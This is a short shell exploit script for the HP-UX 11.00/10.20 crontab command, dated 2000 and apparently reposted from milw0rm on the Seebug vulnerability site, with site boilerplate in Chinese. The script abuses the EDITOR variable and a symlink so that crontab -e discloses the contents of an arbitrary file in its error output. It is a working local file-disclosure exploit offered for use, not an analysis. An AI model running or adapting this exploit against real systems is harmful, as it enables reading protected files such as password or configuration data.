#!/bin/sh # # HP-UX 11.00/10.20 crontab # # Kyong-won,Cho # # dubhe@hackerslab.com # # Usage : ./crontab.sh <distfile> # if [ -z "$1" ] then echo "Usage : $0 <distfile>" exit fi cat << _EOF_ > /tmp/crontab_exp #!/bin/sh ln -sf $1 \$1 _EOF_ chmod 755 /tmp/crontab_exp EDITOR=/tmp/crontab_exp export EDITOR crontab -e 2> /tmp/crontab$$ grep -v "error on previous line" /tmp/crontab$$ rm -f /tmp/crontab_exp /tmp/crontab$$ # milw0rm.com [2000-11-19]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论